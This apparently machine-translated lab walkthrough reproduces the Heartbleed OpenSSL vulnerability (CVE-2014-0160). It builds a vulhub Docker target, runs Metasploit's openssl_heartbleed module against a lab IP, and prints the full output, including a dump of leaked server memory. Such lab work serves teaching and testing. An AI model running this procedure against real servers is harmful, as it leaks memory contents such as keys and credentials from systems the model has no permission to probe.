Openssl Heart Blood Drop Vulnerability Cve 2014 0160
Openssl Heart Blood Drop Vulnerability Cve 2014 0160
OpenSSL Heart Blood Drop Vulnerability CVE-2014-0160
Vulnerability Description
On April 7, 2014, OpenSSL issued a security announcement, which had a vulnerability in the versions of OpenSSL1.0.1 to OpenSSL1.0.1f Beta1. The Chinese name of the vulnerability is HeartBleed and the English name is HeartBleed.
Affect Version
OpenSSL1.0.1, 1.0.1a, 1.0.1b, 1.0.1c, 1.0.1d, 1.0.1e, 1.0.1f, Beta 1 of OpenSSL 1.0.2 and other versions
Environment construction
https://github.com/vulhub/vulhub.git
cd vulhub/openssl/heartbleed
docker-compose up -d
Vulnerability reappears
Use Nmap detection script to detect targets
Detected heart blood drop vulnerability and use MSF to attack the target
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133
rhost => 192.168.51.133
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 192.168.51.133:443 - Leaking heartbeat response #1
[*] 192.168.51.133:443 - Sending Client Hello...
[*] 192.168.51.133:443 - SSL record #1:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 86
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 82
[*] 192.168.51.133:443 - Type: Server Hello (2)
[*] 192.168.51.133:443 - Server Hello Version: 0x0301
[*] 192.168.51.133:443 - Server Hello random data: 5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389
[*] 192.168.51.133:443 - Server Hello Session ID length: 32
[*] 192.168.51.133:443 - Server Hello Session ID: 66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74
[*] 192.168.51.133:443 - SSL record #2:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 822
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 818
[*] 192.168.51.133:443 - Type: Certificate Data (11)
[*] 192.168.51.133:443 - Certificates length: 815
[*] 192.168.51.133:443 - Data length: 818
[*] 192.168.51.133:443 - Certificate #1:
[*] 192.168.51.133:443 - Certificate #1: Length: 812
[*] 192.168.51.133:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.51.133:443 - SSL record #3:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 331
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 327
[*] 192.168.51.133:443 - Type: Server Key Exchange (12)
[*] 192.168.51.133:443 - SSL record #4:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 4
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 0
[*] 192.168.51.133:443 - Type: Server Hello Done (14)
[*] 192.168.51.133:443 - Sending Heartbeat...
[*] 192.168.51.133:443 - Heartbeat response, 65535 bytes
[+] 192.168.51.133:443 - Heartbeat response with leak, 65535 bytes
[*] 192.168.51.133:443 - Printable info leaked:
......_...DV.\....G...{.vc..i ..Gv.'....f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............*.(.........................................+........-.....3.&.$... 3.<.]...et1......L.D.L%*.V8....{............................................................................................................................................jectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>W&V.b...?....|.y..................................................................................................................................... repeated 15479 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................QA......h.......h.........7.RV....7.RV..................................................................................................................................... repeated 4129 times .....................................................................................................................................0......X.......X.........................7.RV..............................RV..=.c.RV.. .7.RV..x.7.RV....7.RV....7.RV..x.7.RV..x.7.RV..h.7.RV....7.RV....7.RV..192.168.51.146 - - [12/Dec/2020:06:47:40 +0000] "POST /sdk HTTP/1.1" 404 170 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)".org/book/nse.html)"..................................................................................................................................... repeated 3184 times .....................................................................................................................................Q ........................7.RV....7.RV..................................................................................................................................... repeated 7539 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................@.......................................................................................................................................................................................................$4.RV..................................@....... .......0.8.RV..........`.......0........$4.RV..jfx...&...~.RV..........PA......`....... '..RV..@d4.RV....................2.RV....................2.RV..........................1.................8.RV..........................1...............................................!...............h....... ...............m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................1.......x.......x.......P.2.RV....2.RV..0.......0.......>#NQ[.8.].......&.i2y.x.I....iOk........a....... '..RV..`.2.RV..................0.2.RV....................2.RV......................;P.e.........................U.6.&`.Ks..w>V.. ^..N..z....z...M.+..n/i..C...D......a..2.p..<.....}k.W:.Eq....Ui*I.X...m...-..x..3}.5NM............... .......P.2.RV..................1.........t.............................0....................V..>...I5.F......!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................................................................................................................................................................................................................................................................................ '..RV.. .8.RV..`.2.RV....................8.RV.................................. .2.RV....................2.RV............................................2.RV....................2.RV.......................... .2.RV.. .2.RV..................h.......h.........8.RV....8.RV..................................................................................................................................... repeated 745 times .....................................................................................................................................#8.RV..`.2.RV........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I ..................................................................................................................................... repeated 277 times .....................................................................................................................................X.......`.2.RV..........................................................P...........RV............................................................................................................................................................................................................................................................................................................................................2.RV..X..................................................................................................................................... repeated 437 times .....................................................................................................................................A.......X.........1.RV..................................................................................................................................................................................................................................................................................................................................X.......X..................................................................................................................................... repeated 429 times .....................................................................................................................................x.......!.......X.......X..................................................................................................................................... repeated 1942 times .....................................................................................................................................@..........V...R.._.i.rzNP.....-..8J.hp..^..k4.G.. f.....(.]..8......:mbG..~.?/..ot...................6...2../..,0..(0...........j..0...*.H........0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0...200809170346Z..210809170346Z0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0.."0...*.H.............0.........8...;....../t.....^.....P..=....w.*b.a>.8.Q.?.$.c.......{G. ........l..i...D..V....0......B..J..Y.c.wO.....M.Df..R....".4.u...............P.><7d}VK4^.$.S..U..u..R7l.+.H....;.V\.w.?..).........[....M..3......?..e...WBI^..&.'.nhV!.......V.;...y..+&tm.c1..3-.....0...*.H..............>.c..|.s(......,..H.1..0.=l`...(2..Sb.......`...c....5J....v..uj.*^i.$6^..a3.s.......v...\....M.pK.9....t.&...|y...u1.......u..M..%.+..{e....G..~.v.D.6...............=).3{......r/."vz..a.U..5-.5.=......l..ud......Nx...n..$h...4.G.~b.LU.Y...37..e....%.w.......K...G...A....~m.h,......qz>}uA.^)..A.&}o@..'...y.]..V..S..JY........Y/.u|....$.n.T._.b\\c...o.]....L.h...v*....z..D..?Kq9hJ.kT....?.....=......su....p.S...j.e.....-N}.S...x..Z.....t.;Z...n=.1.......J.1n.l...w. .l.d.W. .........8..`.>O........t...r..~.A$..R...v.8......x.\o<.....#hS......Vz.6....V..l....-.....,n...p.(..L.w.7h3...3..................................................................................................................................... repeated 6250 times .....................................................................................................................................
[*] 192.168.51.133:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This post is licensed under CC BY 4.0 by the author.